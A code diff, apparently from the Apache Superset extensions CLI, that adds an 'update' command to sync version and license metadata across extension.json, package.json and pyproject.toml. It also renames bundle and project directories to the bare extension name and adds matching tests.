||||
extension_json_path = cwd / "extension.json"
|
||||
extension_data = read_json(extension_json_path)
|
||||
if not extension_data:
|
||||
click.secho("❌ extension.json not found.", err=True, fg="red")
|
||||
sys.exit(1)
|
||||
|
||||
try:
|
||||
extension = ExtensionConfig.model_validate(extension_data)
|
||||
except Exception as e:
|
||||
click.secho(f"❌ Invalid extension.json: {e}", err=True, fg="red")
|
||||
sys.exit(1)
|
||||
|
||||
# Resolve version: prompt if flag used without value
|
||||
if version_opt == "__prompt__":
|
||||
version_opt = click.prompt("Version", default=extension.version)
|
||||
target_version = (
|
||||
version_opt
|
||||
if version_opt and version_opt != extension.version
|
||||
else extension.version
|
||||
)
|
||||
|
||||
# Resolve license: prompt if flag used without value
|
||||
if license_opt == "__prompt__":
|
||||
license_opt = click.prompt("License", default=extension.license or "")
|
||||
target_license = (
|
||||
license_opt
|
||||
if license_opt and license_opt != extension.license
|
||||
else extension.license
|
||||
)
|
||||
|
||||
updated: list[str] = []
|
||||
|
||||
# Update extension.json if version or license changed
|
||||
ext_changed = False
|
||||
if version_opt and version_opt != extension.version:
|
||||
extension_data["version"] = target_version
|
||||
ext_changed = True
|
||||
if license_opt and license_opt != extension.license:
|
||||
extension_data["license"] = target_license
|
||||
ext_changed = True
|
||||
if ext_changed:
|
||||
try:
|
||||
ExtensionConfig.model_validate(extension_data)
|
||||
except Exception as e:
|
||||
click.secho(f"❌ Invalid value: {e}", err=True, fg="red")
|
||||
sys.exit(1)
|
||||
write_json(extension_json_path, extension_data)
|
||||
updated.append("extension.json")
|
||||
|
||||
# Update frontend/package.json
|
||||
frontend_pkg_path = cwd / "frontend" / "package.json"
|
||||
if frontend_pkg_path.is_file():
|
||||
frontend_pkg = read_json(frontend_pkg_path)
|
||||
if frontend_pkg:
|
||||
pkg_changed = False
|
||||
if frontend_pkg.get("version") != target_version:
|
||||
frontend_pkg["version"] = target_version
|
||||
pkg_changed = True
|
||||
if target_license and frontend_pkg.get("license") != target_license:
|
||||
frontend_pkg["license"] = target_license
|
||||
pkg_changed = True
|
||||
if pkg_changed:
|
||||
write_json(frontend_pkg_path, frontend_pkg)
|
||||
updated.append("frontend/package.json")
|
||||
|
||||
# Update backend/pyproject.toml
|
||||
backend_pyproject_path = cwd / "backend" / "pyproject.toml"
|
||||
if backend_pyproject_path.is_file():
|
||||
backend_pyproject = read_toml(backend_pyproject_path)
|
||||
if backend_pyproject:
|
||||
project = backend_pyproject.setdefault("project", {})
|
||||
toml_changed = False
|
||||
if project.get("version") != target_version:
|
||||
project["version"] = target_version
|
||||
toml_changed = True
|
||||
if target_license and project.get("license") != target_license:
|
||||
project["license"] = target_license
|
||||
toml_changed = True
|
||||
if toml_changed:
|
||||
write_toml(backend_pyproject_path, backend_pyproject)
|
||||
updated.append("backend/pyproject.toml")
|
||||
|
||||
if updated:
|
||||
for path in updated:
|
||||
click.secho(f"✅ Updated {path}", fg="green")
|
||||
else:
|
||||
click.secho("✅ All files already up to date.", fg="green")
|
||||
|
||||
|
||||
@app.command()
|
||||
@click.pass_context
|
||||
def build(ctx: click.Context) -> None:
|
||||
"""Build extension assets."""
|
||||
ctx.invoke(validate)
|
||||
cwd = Path.cwd()
|
||||
frontend_dir = cwd / "frontend"
|
||||
@@ -413,6 +571,7 @@ def build(ctx: click.Context) -> None:
|
||||
)
|
||||
@click.pass_context
|
||||
def bundle(ctx: click.Context, output: Path | None) -> None:
|
||||
"""Package the extension into a .supx file."""
|
||||
ctx.invoke(build)
|
||||
|
||||
cwd = Path.cwd()
|
||||
@@ -426,9 +585,9 @@ def bundle(ctx: click.Context, output: Path | None) -> None:
|
||||
sys.exit(1)
|
||||
|
||||
manifest = json.loads(manifest_path.read_text())
|
||||
id_ = manifest["id"]
|
||||
name = manifest["name"]
|
||||
version = manifest["version"]
|
||||
default_filename = f"{id_}-{version}.supx"
|
||||
default_filename = f"{name}-{version}.supx"
|
||||
|
||||
if output is None:
|
||||
zip_path = Path(default_filename)
|
||||
@@ -453,6 +612,7 @@ def bundle(ctx: click.Context, output: Path | None) -> None:
|
||||
@app.command()
|
||||
@click.pass_context
|
||||
def dev(ctx: click.Context) -> None:
|
||||
"""Automatically rebuild the extension as files change."""
|
||||
cwd = Path.cwd()
|
||||
frontend_dir = cwd / "frontend"
|
||||
backend_dir = cwd / "backend"
|
||||
@@ -647,6 +807,7 @@ def init(
|
||||
frontend_opt: bool | None,
|
||||
backend_opt: bool | None,
|
||||
) -> None:
|
||||
"""Scaffold a new extension project."""
|
||||
# Get extension names with graceful validation
|
||||
names = prompt_for_extension_info(display_name_opt, publisher_opt, name_opt)
|
||||
|
||||
@@ -663,7 +824,7 @@ def init(
|
||||
else click.confirm("Include backend?", default=True)
|
||||
)
|
||||
|
||||
target_dir = Path.cwd() / names["id"]
|
||||
target_dir = Path.cwd() / names["name"]
|
||||
if target_dir.exists():
|
||||
click.secho(f"❌ Directory {target_dir} already exists.", fg="red")
|
||||
sys.exit(1)
|
||||
@@ -686,7 +847,7 @@ def init(
|
||||
click.secho("✅ Created extension.json", fg="green")
|
||||
|
||||
# Create .gitignore
|
||||
gitignore = env.get_template(".gitignore.j2").render(ctx)
|
||||
gitignore = env.get_template("gitignore.j2").render(ctx)
|
||||
(target_dir / ".gitignore").write_text(gitignore)
|
||||
click.secho("✅ Created .gitignore", fg="green")
|
||||
|
||||
|
||||
@@ -21,6 +21,8 @@ import sys
|
||||
from pathlib import Path
|
||||
from typing import Any
|
||||
|
||||
import tomli_w
|
||||
|
||||
from superset_core.extensions.constants import (
|
||||
DISPLAY_NAME_PATTERN,
|
||||
PUBLISHER_PATTERN,
|
||||
@@ -109,6 +111,14 @@ def read_json(path: Path) -> dict[str, Any] | None:
|
||||
return json.loads(path.read_text())
|
||||
|
||||
|
||||
def write_json(path: Path, data: dict[str, Any]) -> None:
|
||||
path.write_text(json.dumps(data, indent=2) + "\n")
|
||||
|
||||
|
||||
def write_toml(path: Path, data: dict[str, Any]) -> None:
|
||||
path.write_text(tomli_w.dumps(data))
|
||||
|
||||
|
||||
def _normalize_for_identifiers(name: str) -> str:
|
||||
"""
|
||||
Normalize display name to clean lowercase words.
|
||||
|
||||
@@ -17,10 +17,12 @@
|
||||
|
||||
from __future__ import annotations
|
||||
|
||||
import json
|
||||
import os
|
||||
from pathlib import Path
|
||||
|
||||
import pytest
|
||||
import tomli_w
|
||||
from click.testing import CliRunner
|
||||
|
||||
|
||||
@@ -138,3 +140,69 @@ def extension_setup_for_bundling():
|
||||
(backend_dir / "__init__.py").write_text("# init")
|
||||
|
||||
return _setup
|
||||
|
||||
|
||||
@pytest.fixture
|
||||
def extension_with_versions():
|
||||
"""Create an extension directory structure with configurable versions and licenses."""
|
||||
|
||||
def _create(
|
||||
base_path: Path,
|
||||
ext_version: str = "1.0.0",
|
||||
frontend_version: str | None = None,
|
||||
backend_version: str | None = None,
|
||||
ext_license: str | None = "Apache-2.0",
|
||||
frontend_license: str | None = None,
|
||||
backend_license: str | None = None,
|
||||
) -> None:
|
||||
extension_json = {
|
||||
"publisher": "test-org",
|
||||
"name": "test-extension",
|
||||
"displayName": "Test Extension",
|
||||
"version": ext_version,
|
||||
"permissions": [],
|
||||
}
|
||||
if ext_license is not None:
|
||||
extension_json["license"] = ext_license
|
||||
(base_path / "extension.json").write_text(json.dumps(extension_json))
|
||||
|
||||
if frontend_version is not None:
|
||||
frontend_dir = base_path / "frontend"
|
||||
frontend_dir.mkdir(exist_ok=True)
|
||||
(frontend_dir / "src").mkdir(exist_ok=True)
|
||||
(frontend_dir / "src" / "index.tsx").write_text("// entry")
|
||||
pkg = {
|
||||
"name": "@test-org/test-extension",
|
||||
"version": frontend_version,
|
||||
}
|
||||
if frontend_license is not None:
|
||||
pkg["license"] = frontend_license
|
||||
elif ext_license is not None:
|
||||
pkg["license"] = ext_license
|
||||
(frontend_dir / "package.json").write_text(json.dumps(pkg, indent=2))
|
||||
|
||||
if backend_version is not None:
|
||||
backend_dir = base_path / "backend"
|
||||
backend_dir.mkdir(exist_ok=True)
|
||||
src_dir = backend_dir / "src" / "test_org" / "test_extension"
|
||||
src_dir.mkdir(parents=True, exist_ok=True)
|
||||
(src_dir / "entrypoint.py").write_text("# entry")
|
||||
project = {
|
||||
"name": "test-org-test-extension",
|
||||
"version": backend_version,
|
||||
}
|
||||
if backend_license is not None:
|
||||
project["license"] = backend_license
|
||||
elif ext_license is not None:
|
||||
project["license"] = ext_license
|
||||
pyproject = {
|
||||
"project": project,
|
||||
"tool": {
|
||||
"apache_superset_extensions": {
|
||||
"build": {"include": ["src/**/*.py"]}
|
||||
}
|
||||
},
|
||||
}
|
||||
(backend_dir / "pyproject.toml").write_text(tomli_w.dumps(pyproject))
|
||||
|
||||
return _create
|
||||
|
||||
@@ -121,7 +121,7 @@ def test_build_command_success_flow(
|
||||
# Setup mocks
|
||||
mock_rebuild_frontend.return_value = "remoteEntry.abc123.js"
|
||||
mock_read_toml.return_value = {
|
||||
"project": {"name": "test"},
|
||||
"project": {"name": "test", "version": "1.0.0"},
|
||||
"tool": {
|
||||
"apache_superset_extensions": {
|
||||
"build": {"include": ["src/test_org/test_extension/**/*.py"]}
|
||||
@@ -162,7 +162,7 @@ def test_build_command_handles_frontend_build_failure(
|
||||
# Setup mocks
|
||||
mock_rebuild_frontend.return_value = None # Indicates failure
|
||||
mock_read_toml.return_value = {
|
||||
"project": {"name": "test"},
|
||||
"project": {"name": "test", "version": "1.0.0"},
|
||||
"tool": {
|
||||
"apache_superset_extensions": {
|
||||
"build": {"include": ["src/test_org/test_extension/**/*.py"]}
|
||||
|
||||
@@ -43,10 +43,10 @@ def test_bundle_command_creates_zip_with_default_name(
|
||||
result = cli_runner.invoke(app, ["bundle"])
|
||||
|
||||
assert result.exit_code == 0
|
||||
assert "✅ Bundle created: test-org.test-extension-1.0.0.supx" in result.output
|
||||
assert "✅ Bundle created: test-extension-1.0.0.supx" in result.output
|
||||
|
||||
# Verify zip file was created
|
||||
zip_path = isolated_filesystem / "test-org.test-extension-1.0.0.supx"
|
||||
zip_path = isolated_filesystem / "test-extension-1.0.0.supx"
|
||||
assert_file_exists(zip_path)
|
||||
|
||||
# Verify zip contents
|
||||
@@ -100,7 +100,7 @@ def test_bundle_command_with_output_directory(
|
||||
assert result.exit_code == 0
|
||||
|
||||
# Verify zip file was created in output directory
|
||||
expected_path = output_dir / "test-org.test-extension-1.0.0.supx"
|
||||
expected_path = output_dir / "test-extension-1.0.0.supx"
|
||||
assert_file_exists(expected_path)
|
||||
assert f"✅ Bundle created: {expected_path}" in result.output
|
||||
|
||||
@@ -193,7 +193,7 @@ def test_bundle_includes_all_files_recursively(
|
||||
assert result.exit_code == 0
|
||||
|
||||
# Verify zip file and contents
|
||||
zip_path = isolated_filesystem / "complex-org.complex-extension-2.1.0.supx"
|
||||
zip_path = isolated_filesystem / "complex-extension-2.1.0.supx"
|
||||
assert_file_exists(zip_path)
|
||||
|
||||
with zipfile.ZipFile(zip_path, "r") as zipf:
|
||||
|
||||
@@ -48,12 +48,12 @@ def test_init_creates_extension_with_both_frontend_and_backend(
|
||||
)
|
||||
|
||||
# Verify directory structure
|
||||
extension_path = isolated_filesystem / "test-org.test-extension"
|
||||
extension_path = isolated_filesystem / "test-extension"
|
||||
assert_directory_exists(extension_path, "main extension directory")
|
||||
|
||||
expected_structure = create_test_extension_structure(
|
||||
isolated_filesystem,
|
||||
"test-org.test-extension",
|
||||
"test-extension",
|
||||
include_frontend=True,
|
||||
include_backend=True,
|
||||
)
|
||||
@@ -74,7 +74,7 @@ def test_init_creates_extension_with_frontend_only(
|
||||
|
||||
assert result.exit_code == 0, f"Command failed with output: {result.output}"
|
||||
|
||||
extension_path = isolated_filesystem / "test-org.test-extension"
|
||||
extension_path = isolated_filesystem / "test-extension"
|
||||
assert_directory_exists(extension_path)
|
||||
|
||||
# Should have frontend directory and package.json
|
||||
@@ -97,7 +97,7 @@ def test_init_creates_extension_with_backend_only(
|
||||
|
||||
assert result.exit_code == 0, f"Command failed with output: {result.output}"
|
||||
|
||||
extension_path = isolated_filesystem / "test-org.test-extension"
|
||||
extension_path = isolated_filesystem / "test-extension"
|
||||
assert_directory_exists(extension_path)
|
||||
|
||||
# Should have backend directory and pyproject.toml
|
||||
@@ -120,7 +120,7 @@ def test_init_creates_extension_with_neither_frontend_nor_backend(
|
||||
|
||||
assert result.exit_code == 0, f"Command failed with output: {result.output}"
|
||||
|
||||
extension_path = isolated_filesystem / "test-org.test-extension"
|
||||
extension_path = isolated_filesystem / "test-extension"
|
||||
assert_directory_exists(extension_path)
|
||||
|
||||
# Should only have extension.json
|
||||
@@ -138,8 +138,8 @@ def test_init_accepts_valid_display_name(cli_runner, isolated_filesystem):
|
||||
result = cli_runner.invoke(app, ["init"], input=cli_input)
|
||||
|
||||
assert result.exit_code == 0, f"Should accept display name: {result.output}"
|
||||
assert Path("test-org.my-awesome-extension").exists(), (
|
||||
"Directory for generated composite ID should be created"
|
||||
assert Path("my-awesome-extension").exists(), (
|
||||
"Directory with extension name should be created"
|
||||
)
|
||||
|
||||
|
||||
@@ -152,23 +152,21 @@ def test_init_accepts_mixed_alphanumeric_name(cli_runner, isolated_filesystem):
|
||||
assert result.exit_code == 0, (
|
||||
f"Mixed alphanumeric display name should be valid: {result.output}"
|
||||
)
|
||||
assert Path("test-org.tool-123").exists(), (
|
||||
"Directory for 'test-org.tool-123' should be created"
|
||||
)
|
||||
assert Path("tool-123").exists(), "Directory for 'tool-123' should be created"
|
||||
|
||||
|
||||
@pytest.mark.cli
|
||||
@pytest.mark.parametrize(
|
||||
"display_name,expected_id",
|
||||
"display_name,expected_dir",
|
||||
[
|
||||
("Test Extension", "test-org.test-extension"),
|
||||
("My Tool v2", "test-org.my-tool-v2"),
|
||||
("Dashboard Helper", "test-org.dashboard-helper"),
|
||||
("Chart Builder Pro", "test-org.chart-builder-pro"),
|
||||
("Test Extension", "test-extension"),
|
||||
("My Tool v2", "my-tool-v2"),
|
||||
("Dashboard Helper", "dashboard-helper"),
|
||||
("Chart Builder Pro", "chart-builder-pro"),
|
||||
],
|
||||
)
|
||||
def test_init_with_various_display_names(cli_runner, display_name, expected_id):
|
||||
"""Test that init accepts various display names and generates proper IDs."""
|
||||
def test_init_with_various_display_names(cli_runner, display_name, expected_dir):
|
||||
"""Test that init accepts various display names and creates directory named after extension."""
|
||||
with cli_runner.isolated_filesystem():
|
||||
cli_input = f"{display_name}\n\ntest-org\n0.1.0\nApache-2.0\ny\ny\n"
|
||||
result = cli_runner.invoke(app, ["init"], input=cli_input)
|
||||
@@ -176,8 +174,8 @@ def test_init_with_various_display_names(cli_runner, display_name, expected_id):
|
||||
assert result.exit_code == 0, (
|
||||
f"Valid display name '{display_name}' was rejected: {result.output}"
|
||||
)
|
||||
assert Path(expected_id).exists(), (
|
||||
f"Directory for '{expected_id}' was not created"
|
||||
assert Path(expected_dir).exists(), (
|
||||
f"Directory '{expected_dir}' was not created"
|
||||
)
|
||||
|
||||
|
||||
@@ -187,7 +185,7 @@ def test_init_fails_when_directory_already_exists(
|
||||
):
|
||||
"""Test that init fails gracefully when target directory already exists."""
|
||||
# Create the directory first
|
||||
existing_dir = isolated_filesystem / "test-org.test-extension"
|
||||
existing_dir = isolated_filesystem / "test-extension"
|
||||
existing_dir.mkdir()
|
||||
|
||||
result = cli_runner.invoke(app, ["init"], input=cli_input_both)
|
||||
@@ -204,7 +202,7 @@ def test_extension_json_content_is_correct(
|
||||
result = cli_runner.invoke(app, ["init"], input=cli_input_both)
|
||||
assert result.exit_code == 0
|
||||
|
||||
extension_path = isolated_filesystem / "test-org.test-extension"
|
||||
extension_path = isolated_filesystem / "test-extension"
|
||||
extension_json_path = extension_path / "extension.json"
|
||||
|
||||
# Verify the JSON structure and values
|
||||
@@ -238,7 +236,7 @@ def test_frontend_package_json_content_is_correct(
|
||||
result = cli_runner.invoke(app, ["init"], input=cli_input_both)
|
||||
assert result.exit_code == 0
|
||||
|
||||
extension_path = isolated_filesystem / "test-org.test-extension"
|
||||
extension_path = isolated_filesystem / "test-extension"
|
||||
package_json_path = extension_path / "frontend" / "package.json"
|
||||
|
||||
# Verify the package.json structure and values
|
||||
@@ -267,7 +265,7 @@ def test_backend_pyproject_toml_is_created(
|
||||
result = cli_runner.invoke(app, ["init"], input=cli_input_both)
|
||||
assert result.exit_code == 0
|
||||
|
||||
extension_path = isolated_filesystem / "test-org.test-extension"
|
||||
extension_path = isolated_filesystem / "test-extension"
|
||||
pyproject_path = extension_path / "backend" / "pyproject.toml"
|
||||
|
||||
assert_file_exists(pyproject_path, "backend pyproject.toml")
|
||||
@@ -305,7 +303,7 @@ def test_gitignore_content_is_correct(cli_runner, isolated_filesystem, cli_input
|
||||
result = cli_runner.invoke(app, ["init"], input=cli_input_both)
|
||||
assert result.exit_code == 0
|
||||
|
||||
extension_path = isolated_filesystem / "test-org.test-extension"
|
||||
extension_path = isolated_filesystem / "test-extension"
|
||||
gitignore_path = extension_path / ".gitignore"
|
||||
|
||||
assert_file_exists(gitignore_path, ".gitignore")
|
||||
@@ -330,7 +328,7 @@ def test_init_with_custom_version_and_license(cli_runner, isolated_filesystem):
|
||||
|
||||
assert result.exit_code == 0
|
||||
|
||||
extension_path = isolated_filesystem / "test-org.my-extension"
|
||||
extension_path = isolated_filesystem / "my-extension"
|
||||
extension_json_path = extension_path / "extension.json"
|
||||
|
||||
assert_json_content(
|
||||
@@ -357,10 +355,10 @@ def test_full_init_workflow_integration(cli_runner, isolated_filesystem):
|
||||
assert result.exit_code == 0
|
||||
|
||||
# Verify complete directory structure
|
||||
extension_path = isolated_filesystem / "awesome-org.awesome-charts"
|
||||
extension_path = isolated_filesystem / "awesome-charts"
|
||||
expected_structure = create_test_extension_structure(
|
||||
isolated_filesystem,
|
||||
"awesome-org.awesome-charts",
|
||||
"awesome-charts",
|
||||
include_frontend=True,
|
||||
include_backend=True,
|
||||
)
|
||||
@@ -412,7 +410,7 @@ def test_init_non_interactive_with_all_options(cli_runner, isolated_filesystem):
|
||||
assert result.exit_code == 0, f"Command failed with output: {result.output}"
|
||||
assert "🎉 Extension My Extension (ID: my-org.my-ext) initialized" in result.output
|
||||
|
||||
extension_path = isolated_filesystem / "my-org.my-ext"
|
||||
extension_path = isolated_filesystem / "my-ext"
|
||||
assert_directory_exists(extension_path)
|
||||
assert_directory_exists(extension_path / "frontend")
|
||||
assert_directory_exists(extension_path / "backend")
|
||||
@@ -449,7 +447,7 @@ def test_init_frontend_only_with_cli_options(cli_runner, isolated_filesystem):
|
||||
|
||||
assert result.exit_code == 0, f"Command failed with output: {result.output}"
|
||||
|
||||
extension_path = isolated_filesystem / "frontend-org.frontend-ext"
|
||||
extension_path = isolated_filesystem / "frontend-ext"
|
||||
assert_directory_exists(extension_path / "frontend")
|
||||
assert not (extension_path / "backend").exists()
|
||||
|
||||
@@ -478,7 +476,7 @@ def test_init_backend_only_with_cli_options(cli_runner, isolated_filesystem):
|
||||
|
||||
assert result.exit_code == 0, f"Command failed with output: {result.output}"
|
||||
|
||||
extension_path = isolated_filesystem / "backend-org.backend-ext"
|
||||
extension_path = isolated_filesystem / "backend-ext"
|
||||
assert not (extension_path / "frontend").exists()
|
||||
assert_directory_exists(extension_path / "backend")
|
||||
|
||||
@@ -505,7 +503,7 @@ def test_init_prompts_for_missing_options(cli_runner, isolated_filesystem):
|
||||
|
||||
assert result.exit_code == 0, f"Command failed with output: {result.output}"
|
||||
|
||||
extension_path = isolated_filesystem / "default-org.default-ext"
|
||||
extension_path = isolated_filesystem / "default-ext"
|
||||
extension_json = load_json_file(extension_path / "extension.json")
|
||||
assert extension_json["version"] == "0.1.0"
|
||||
assert extension_json["license"] == "Apache-2.0"
|
||||
|
||||
172
superset-extensions-cli/tests/test_cli_update.py
Normal file
172
superset-extensions-cli/tests/test_cli_update.py
Normal file
@@ -0,0 +1,172 @@
|
||||
# Licensed to the Apache Software Foundation (ASF) under one
|
||||
# or more contributor license agreements. See the NOTICE file
|
||||
# distributed with this work for additional information
|
||||
# regarding copyright ownership. The ASF licenses this file
|
||||
# to you under the Apache License, Version 2.0 (the
|
||||
# "License"); you may not use this file except in compliance
|
||||
# with the License. You may obtain a copy of the License at
|
||||
#
|
||||
# http://www.apache.org/licenses/LICENSE-2.0
|
||||
#
|
||||
# Unless required by applicable law or agreed to in writing,
|
||||
# software distributed under the License is distributed on an
|
||||
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
|
||||
# KIND, either express or implied. See the License for the
|
||||
# specific language governing permissions and limitations
|
||||
# under the License.
|
||||
|
||||
from __future__ import annotations
|
||||
|
||||
import pytest
|
||||
from superset_extensions_cli.cli import app
|
||||
from superset_extensions_cli.utils import read_json, read_toml
|
||||
|
||||
|
||||
@pytest.mark.cli
|
||||
def test_update_syncs_versions(
|
||||
cli_runner, isolated_filesystem, extension_with_versions
|
||||
):
|
||||
"""Test update syncs frontend and backend versions from extension.json."""
|
||||
extension_with_versions(
|
||||
isolated_filesystem,
|
||||
ext_version="2.0.0",
|
||||
frontend_version="1.0.0",
|
||||
backend_version="1.0.0",
|
||||
)
|
||||
|
||||
result = cli_runner.invoke(app, ["update"])
|
||||
|
||||
assert result.exit_code == 0
|
||||
assert "Updated frontend/package.json" in result.output
|
||||
assert "Updated backend/pyproject.toml" in result.output
|
||||
|
||||
frontend_pkg = read_json(isolated_filesystem / "frontend" / "package.json")
|
||||
assert frontend_pkg["version"] == "2.0.0"
|
||||
|
||||
backend_pyproject = read_toml(isolated_filesystem / "backend" / "pyproject.toml")
|
||||
assert backend_pyproject["project"]["version"] == "2.0.0"
|
||||
|
||||
|
||||
@pytest.mark.cli
|
||||
def test_update_noop_when_all_match(
|
||||
cli_runner, isolated_filesystem, extension_with_versions
|
||||
):
|
||||
"""Test update reports no changes when everything already matches."""
|
||||
extension_with_versions(
|
||||
isolated_filesystem,
|
||||
ext_version="1.0.0",
|
||||
frontend_version="1.0.0",
|
||||
backend_version="1.0.0",
|
||||
)
|
||||
|
||||
result = cli_runner.invoke(app, ["update"])
|
||||
|
||||
assert result.exit_code == 0
|
||||
assert "All files already up to date" in result.output
|
||||
|
||||
|
||||
@pytest.mark.cli
|
||||
def test_update_fails_without_extension_json(cli_runner, isolated_filesystem):
|
||||
"""Test update fails when extension.json is missing."""
|
||||
result = cli_runner.invoke(app, ["update"])
|
||||
|
||||
assert result.exit_code != 0
|
||||
assert "extension.json not found" in result.output
|
||||
|
||||
|
||||
@pytest.mark.cli
|
||||
def test_update_with_version_flag(
|
||||
cli_runner, isolated_filesystem, extension_with_versions
|
||||
):
|
||||
"""Test --version updates extension.json first, then syncs all files."""
|
||||
extension_with_versions(
|
||||
isolated_filesystem,
|
||||
ext_version="1.0.0",
|
||||
frontend_version="1.0.0",
|
||||
backend_version="1.0.0",
|
||||
)
|
||||
|
||||
result = cli_runner.invoke(app, ["update", "--version", "3.0.0"])
|
||||
|
||||
assert result.exit_code == 0
|
||||
assert "Updated extension.json" in result.output
|
||||
assert "Updated frontend/package.json" in result.output
|
||||
assert "Updated backend/pyproject.toml" in result.output
|
||||
|
||||
ext = read_json(isolated_filesystem / "extension.json")
|
||||
assert ext["version"] == "3.0.0"
|
||||
|
||||
frontend_pkg = read_json(isolated_filesystem / "frontend" / "package.json")
|
||||
assert frontend_pkg["version"] == "3.0.0"
|
||||
|
||||
backend_pyproject = read_toml(isolated_filesystem / "backend" / "pyproject.toml")
|
||||
assert backend_pyproject["project"]["version"] == "3.0.0"
|
||||
|
||||
|
||||
@pytest.mark.cli
|
||||
def test_update_with_license_flag(
|
||||
cli_runner, isolated_filesystem, extension_with_versions
|
||||
):
|
||||
"""Test --license updates license across all files."""
|
||||
extension_with_versions(
|
||||
isolated_filesystem,
|
||||
ext_version="1.0.0",
|
||||
frontend_version="1.0.0",
|
||||
backend_version="1.0.0",
|
||||
ext_license="Apache-2.0",
|
||||
)
|
||||
|
||||
result = cli_runner.invoke(app, ["update", "--license", "MIT"])
|
||||
|
||||
assert result.exit_code == 0
|
||||
assert "Updated extension.json" in result.output
|
||||
assert "Updated frontend/package.json" in result.output
|
||||
assert "Updated backend/pyproject.toml" in result.output
|
||||
|
||||
ext = read_json(isolated_filesystem / "extension.json")
|
||||
assert ext["license"] == "MIT"
|
||||
|
||||
frontend_pkg = read_json(isolated_filesystem / "frontend" / "package.json")
|
||||
assert frontend_pkg["license"] == "MIT"
|
||||
|
||||
backend_pyproject = read_toml(isolated_filesystem / "backend" / "pyproject.toml")
|
||||
assert backend_pyproject["project"]["license"] == "MIT"
|
||||
|
||||
|
||||
@pytest.mark.cli
|
||||
def test_update_version_prompt_default(
|
||||
cli_runner, isolated_filesystem, extension_with_versions
|
||||
):
|
||||
"""Test --version without value prompts with current version as default."""
|
||||
extension_with_versions(
|
||||
isolated_filesystem,
|
||||
ext_version="1.0.0",
|
||||
frontend_version="1.0.0",
|
||||
backend_version="1.0.0",
|
||||
)
|
||||
|
||||
# Hit enter to accept default — nothing should change
|
||||
result = cli_runner.invoke(app, ["update", "--version"], input="\n")
|
||||
|
||||
assert result.exit_code == 0
|
||||
assert "All files already up to date" in result.output
|
||||
|
||||
|
||||
@pytest.mark.cli
|
||||
def test_update_rejects_invalid_version(
|
||||
cli_runner, isolated_filesystem, extension_with_versions
|
||||
):
|
||||
"""Test --version with an invalid semver string exits with error."""
|
||||
extension_with_versions(
|
||||
isolated_filesystem,
|
||||
ext_version="1.0.0",
|
||||
)
|
||||
|
||||
result = cli_runner.invoke(app, ["update", "--version", "not-a-version"])
|
||||
|
||||
assert result.exit_code != 0
|
||||
assert "Invalid value" in result.output
|
||||
|
||||
# Verify extension.json was not modified
|
||||
ext = read_json(isolated_filesystem / "extension.json")
|
||||
assert ext["version"] == "1.0.0"
|
||||
@@ -207,3 +207,66 @@ def test_validate_npm_with_empty_version_output_raises_error(mock_run, mock_whic
|
||||
# semver.compare will raise ValueError for empty version
|
||||
with pytest.raises(ValueError):
|
||||
validate_npm()
|
||||
|
||||
|
||||
# Version Consistency Tests
|
||||
@pytest.mark.cli
|
||||
def test_validate_fails_on_version_mismatch(
|
||||
cli_runner, isolated_filesystem, extension_with_versions
|
||||
):
|
||||
"""Test validate fails when frontend/backend versions differ from extension.json."""
|
||||
extension_with_versions(
|
||||
isolated_filesystem,
|
||||
ext_version="2.0.0",
|
||||
frontend_version="1.0.0",
|
||||
backend_version="1.0.0",
|
||||
)
|
||||
|
||||
with patch("superset_extensions_cli.cli.validate_npm"):
|
||||
result = cli_runner.invoke(app, ["validate"])
|
||||
|
||||
assert result.exit_code != 0
|
||||
assert "Metadata mismatch" in result.output
|
||||
assert "superset-extensions update" in result.output
|
||||
|
||||
|
||||
@pytest.mark.cli
|
||||
def test_validate_passes_with_matching_versions(
|
||||
cli_runner, isolated_filesystem, extension_with_versions
|
||||
):
|
||||
"""Test validate passes when all versions match extension.json."""
|
||||
extension_with_versions(
|
||||
isolated_filesystem,
|
||||
ext_version="1.0.0",
|
||||
frontend_version="1.0.0",
|
||||
backend_version="1.0.0",
|
||||
)
|
||||
|
||||
with patch("superset_extensions_cli.cli.validate_npm"):
|
||||
result = cli_runner.invoke(app, ["validate"])
|
||||
|
||||
assert result.exit_code == 0
|
||||
assert "Validation successful" in result.output
|
||||
|
||||
|
||||
@pytest.mark.cli
|
||||
def test_validate_fails_on_license_mismatch(
|
||||
cli_runner, isolated_filesystem, extension_with_versions
|
||||
):
|
||||
"""Test validate fails when frontend/backend licenses differ from extension.json."""
|
||||
extension_with_versions(
|
||||
isolated_filesystem,
|
||||
ext_version="1.0.0",
|
||||
frontend_version="1.0.0",
|
||||
backend_version="1.0.0",
|
||||
ext_license="Apache-2.0",
|
||||
frontend_license="MIT",
|
||||
backend_license="MIT",
|
||||
)
|
||||
|
||||
with patch("superset_extensions_cli.cli.validate_npm"):
|
||||
result = cli_runner.invoke(app, ["validate"])
|
||||
|
||||
assert result.exit_code != 0
|
||||
assert "Metadata mismatch" in result.output
|
||||
assert "license" in result.output
|
||||
|
||||
@@ -20,7 +20,7 @@ from __future__ import annotations
|
||||
import json
|
||||
|
||||
import pytest
|
||||
from superset_extensions_cli.utils import read_json, read_toml
|
||||
from superset_extensions_cli.utils import read_json, read_toml, write_json, write_toml
|
||||
|
||||
|
||||
# Read JSON Tests
|
||||
@@ -269,3 +269,32 @@ def test_read_toml_with_permission_denied(isolated_filesystem):
|
||||
toml_file.chmod(0o644)
|
||||
except (OSError, PermissionError):
|
||||
pass
|
||||
|
||||
|
||||
# Write JSON Tests
|
||||
@pytest.mark.unit
|
||||
def test_write_json_round_trip(isolated_filesystem):
|
||||
"""Test write_json then read_json round-trip preserves content."""
|
||||
data = {"name": "test-extension", "version": "2.0.0", "nested": {"key": "value"}}
|
||||
json_file = isolated_filesystem / "output.json"
|
||||
|
||||
write_json(json_file, data)
|
||||
result = read_json(json_file)
|
||||
|
||||
assert result == data
|
||||
|
||||
|
||||
# Write TOML Tests
|
||||
@pytest.mark.unit
|
||||
def test_write_toml_round_trip(isolated_filesystem):
|
||||
"""Test write_toml then read_toml round-trip preserves content."""
|
||||
data = {
|
||||
"project": {"name": "test-package", "version": "1.0.0"},
|
||||
"tool": {"apache_superset_extensions": {"build": {"include": ["src/**/*.py"]}}},
|
||||
}
|
||||
toml_file = isolated_filesystem / "output.toml"
|
||||
|
||||
write_toml(toml_file, data)
|
||||
result = read_toml(toml_file)
|
||||
|
||||
assert result == data
|
||||
|
||||
@@ -127,7 +127,6 @@ module.exports = {
|
||||
},
|
||||
plugins: [
|
||||
'import',
|
||||
'file-progress',
|
||||
'lodash',
|
||||
'theme-colors',
|
||||
'icons',
|
||||
|
||||
